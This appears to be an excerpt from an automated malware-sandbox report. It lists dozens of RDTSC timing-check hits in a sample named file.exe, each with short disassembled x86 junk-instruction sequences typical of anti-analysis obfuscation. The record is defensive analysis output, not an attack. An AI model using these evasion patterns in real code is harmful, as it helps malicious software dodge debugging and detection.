Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521C2C second address: 521C4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F59556149A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F595561499Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521C4E second address: 521C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521DDC second address: 521DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52806C second address: 52807D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F5954CE94A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD046 second address: 4BD052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5955614998h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD052 second address: 4BD088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007F5954CE94A6h 0x00000010 jmp 00007F5954CE94B2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528B40 second address: 528B46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528DEE second address: 528E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F5954CE94A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jo 00007F5954CE94A6h 0x00000017 pop ecx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528E09 second address: 528E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F595561499Dh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edx 0x00000012 jmp 00007F595561499Fh 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53007B second address: 530081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509053 second address: 50906A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F59556149A1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A144 second address: 50A148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D2F5 second address: 50D2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E5B0 second address: 50E5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E5B6 second address: 50E5CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5955614998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F5955614998h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E5CD second address: 50E5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5116FC second address: 511718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5955614996h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 512729 second address: 51272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51272D second address: 512731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517AD5 second address: 517AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517AEB second address: 517B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F595561499Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517B02 second address: 517B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517B08 second address: 517B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 518B47 second address: 518B51 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EDDB second address: 52EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EDE0 second address: 52EDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EDFB second address: 52EE09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F5955614996h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EE09 second address: 52EE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F6FE second address: 52F723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F5955614996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F59556149A6h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FA2B second address: 52FA5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B1h 0x00000007 jl 00007F5954CE94C0h 0x0000000d jmp 00007F5954CE94B4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FF54 second address: 52FF58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533B1C second address: 533B22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533B22 second address: 533B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F59556149A6h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnp 00007F595561499Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533B51 second address: 533B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384D3 second address: 5384DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384DA second address: 5384E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384E3 second address: 5384E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538958 second address: 53895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538F27 second address: 538F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F595561499Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538F40 second address: 538F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539338 second address: 539357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539357 second address: 539368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F5954CE94A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539368 second address: 53937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F5955614996h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2DB9 second address: 4B2DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ABh 0x00000007 jp 00007F5954CE94A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F5954CE94A8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2DDA second address: 4B2DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541833 second address: 541839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541839 second address: 54183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541CAF second address: 541CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jnp 00007F5954CE94A6h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541E1C second address: 541E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541E26 second address: 541E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541E2E second address: 541E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54227A second address: 54227E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5423D7 second address: 5423E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007F5955614996h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5423E7 second address: 5423FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5423FE second address: 542404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542404 second address: 542433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jne 00007F5954CE94A6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jc 00007F5954CE94A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542433 second address: 542437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542437 second address: 542448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 ja 00007F5954CE94A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542448 second address: 54244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5425A7 second address: 5425C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E394B second address: 4E3956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5955614996h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3956 second address: 4E3966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ABh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C54A6 second address: 4C54B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C54B4 second address: 4C54C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54138D second address: 5413ED instructions: 0x00000000 rdtsc 0x00000002 je 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F595561499Eh 0x00000016 jmp 00007F595561499Eh 0x0000001b pushad 0x0000001c popad 0x0000001d jnp 00007F5955614996h 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F595561499Ch 0x0000002b push ebx 0x0000002c jmp 00007F595561499Eh 0x00000031 ja 00007F5955614996h 0x00000037 pop ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pop edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5477F9 second address: 547817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ADh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F5954CE94A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE16E second address: 4FE194 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F59556149A3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jbe 00007F5955614996h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE194 second address: 4FE19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE385 second address: 4FE3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], esi 0x0000000b and ecx, dword ptr [ebp+122D3905h] 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F59556149A1h 0x0000001a jmp 00007F595561499Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE563 second address: 4FE56D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE56D second address: 4FE572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEAF1 second address: 4FEAFB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEAFB second address: 4FEB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEB00 second address: 4FEB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F5954CE94AEh 0x0000000e jc 00007F5954CE94A8h 0x00000014 pushad 0x00000015 popad 0x00000016 nop 0x00000017 xor edi, dword ptr [ebp+122D382Dh] 0x0000001d push 0000001Eh 0x0000001f or dword ptr [ebp+122D1953h], eax 0x00000025 nop 0x00000026 jng 00007F5954CE94B2h 0x0000002c jmp 00007F5954CE94ACh 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEB3D second address: 4FEB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5955614996h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEECA second address: 4FEEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007F5954CE94A6h 0x0000000f jns 00007F5954CE94A6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEF7E second address: 4FEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FEF82 second address: 4E394B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F5954CE94B9h 0x00000011 jno 00007F5954CE94ACh 0x00000017 popad 0x00000018 nop 0x00000019 jo 00007F5954CE94A9h 0x0000001f movsx ecx, ax 0x00000022 call dword ptr [ebp+122D2B46h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F5954CE94ACh 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546FCD second address: 546FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F595561499Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546FE0 second address: 547015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F5954CE94C8h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547015 second address: 547022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F59556149A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5472DD second address: 5472E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5472E1 second address: 547301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F59556149A8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547301 second address: 547305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547305 second address: 547312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547312 second address: 547318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547318 second address: 547320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547320 second address: 547346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5954CE94A6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F5954CE94A6h 0x00000017 pop edi 0x00000018 je 00007F5954CE94AEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547346 second address: 547361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54994B second address: 549953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549953 second address: 54997E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F59556149A1h 0x0000000d jg 00007F59556149A2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549ADC second address: 549AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549AE4 second address: 549AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C64B second address: 54C651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54CA38 second address: 54CA45 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54CA45 second address: 54CA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94B1h 0x00000009 pop esi 0x0000000a jc 00007F5954CE94ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
